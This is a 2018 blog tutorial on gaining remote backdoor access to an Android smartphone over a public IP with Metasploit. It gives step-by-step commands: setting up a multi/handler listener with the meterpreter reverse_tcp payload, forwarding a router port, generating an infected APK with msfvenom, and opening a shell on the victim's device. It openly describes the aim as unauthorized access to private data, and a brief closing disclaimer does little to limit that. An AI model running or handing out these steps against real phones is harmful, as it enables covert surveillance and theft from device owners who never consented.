How to Gain Remote Access To an Android with Metasploit (Public IP)

by hash3liZer . 12 April 2018

How to Gain Remote Access To an Android with Metasploit (Public IP)

Welcome to the Metasploit Exploitation tutorial. In this tutorial, we will be gaining backdoor access to an android target with metasploit over Public IP. We will be working around the metasploit exploit handler with executable meterpreter android payload for the remote access.


Metasploit is an exploitation framework, used by researchers for breaking into various vulnerable systems with a designed set of exploits. It provides a reasonable updated database of exploits with various payloads and other modules, used to perform malign tasks on target window like sniffing keystrokes, executing arbitrary shell commands and silently taking snapshots etc.

Besides, everything else metasploit offers. Its basic purpose is to test appropriate application through discovered loopholes.

Android is a well-targeted operating system. To preserve its state, these systems are well-maintained and updated and firewalls of such systems are well-acquainted with the execution of exploits. So, there might be chances that the target firewall may understand the nature of exploit while the payload is still taking coverage.


A major understanding of Command line environment and command syntax and the knowledge of basic commands like ip route. Metasploit installed. This tutorial is explained on the basis of Kali Linux as attacker OS and Android KitKat as target OS.

Gaining Remote Access to Android Smartphone Over Public IP


Preparing Metasploit

Open the console (terminal). Check the weekly updates and make changes to metasploit if necessary or if any new modules are detected. Doing so will keep you informed of newly added modules and exploits.


After that, start postgresql database service. Metasploit uses postgresql as the storage server. This will enable us to quickly navigate and search through metasploit modules, preventing the slow search issue that wastes time while systematizing the output.

systemctl enable postgresql
systemctl start postgresql

Enabling the postgresql will start it everytime the system boots. Now, there's no need to perform this step, next time, metasploit is going to flash.

Type msfconsole in terminal and press [Enter]. It will take a few seconds to bring the interface up to its fully functional state.



Choose the exploit

Search for an appropriate exploit for target OS using search command. Our target is an android smartphone. So, the query for an Android could be like:

search type:exploit platform:android

It will list the exploits available for android platform. You can get help on metasploit commands by typing help followed by a space with command name such as help search. It will print the manual for search command. Here's the output for android exploit search:


From the given list of exploits as shown in the image, we will use the generic exploit as highlighted. Now, to use the exploit, enter this command:

use exploit/multi/handler
use exploit/multi/handler

There is a set of payloads given for every single exploit. These payloads are actually the exploit modules that provides a backbone environment for transferring and executing commands on target window. Different payloads are used according to the given scenario and by guessing how much working space of target is required. Well, to show the payloads given for an exploit. Type in:

show payloads
show payloads

From the given set of payloads, we will use android/meterpreter/reverse_tcp. It's a great versatile payload to get started with. It will bring us a meterpreter session if payload executes unspotted. This meterpreter payload presents a handful list of directives which are useful enough to wholly compromise the target system.

set PAYLOAD android/meterpreter/reverse_tcp


Set Options

Attain the information of exploit using info command. This is the key step to get an idea, how actually the exploit works. It will give you the background information like what could be the possible targets and what the core of vulnerability is.


At this point, we know the working of exploit. Now, we have to setup the options for our exploit which are LHOST for local address of attacker and LPORT for the local port to use. To find local IP address type.

ip route
ip route

So, my local IP is Set LHOST and LPORT

set LPORT 777         # Port for establishing connections

Make sure that both of the paramters are correctly modified.

show options
show options


Run the Exploit

Run the exploit as a job. The exploit will execute in the background and will notify you whenever the payload executes on the target system. Afterward, we will use sessions command to launch (target) session.

exploit -j
exploit -j


IP Forwarding

Find the Gateway IP of your Network and navigate to that IP through a web browser and login. Type:

route -n
route -n

Now, open a web browser and login to Router administrative Page.

logging into router

After successful login, enable the port 777 so that firewall allows the client and attacker machines to forward and receive traffic. You probably don't know how to forward a port on your router. For doing so, go to, search for your router company and model and follow the instructions for your router.


Generate (Infected) Application

For generating the infected (payload) application with extension .apk, we will use msfvenom, native payload generator of Metasploit framework. Open a new console (terminal) and generate a Simple Payload Application for android.

msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=Public IP Address (attacker) LPORT=777


  • -p: payload to use
  • --platform: Target Platform
  • -o: Path to place the infected file
  • LHOST: Public IP of attacker (local) Machine
  • LPORT: Public Port of attacker (local) Machine


Own the target

Now, as soon the spawned apk file will operate on an android Operating System (target). Metasploit terminal which we have left open will bring us a live target session. List the available sessions:

sessions -l

Now, to interact with a session. Just type in the session identifier (ID) after the sessions directive. It will take you to the meterpreter shell.

sessions [n]      # [n] is the ID of available sessions
sessions 2

Meterpreter terminal will be launched. Type help command. It will list a handful of commands from getting system info to starting live Chat.

meterpreter > help

Ignore meterpreter > . Its just there to indicate that its a meteterpreter session.

Lets try the shell command. It will bring us the terminal or cmd (if windows) of target system. Try to execute a command.

meterpreter > shell


We have seen to gain unauthorized confidential access to an Android Smartphone with metasploit and seen to disclose private data of target with a given set of meterpreter commands. Before, you proceed to a lively target, make sure you are well-acquainted with all the possible consequences of such a theft. They may lead to disastrous impacts. As already mentioned, metasploit is just a vulnerability assessment Project. Its main intention to get familiarize with how powerful a loophole could be and which sectors of a system could it give access to leave compromised actions.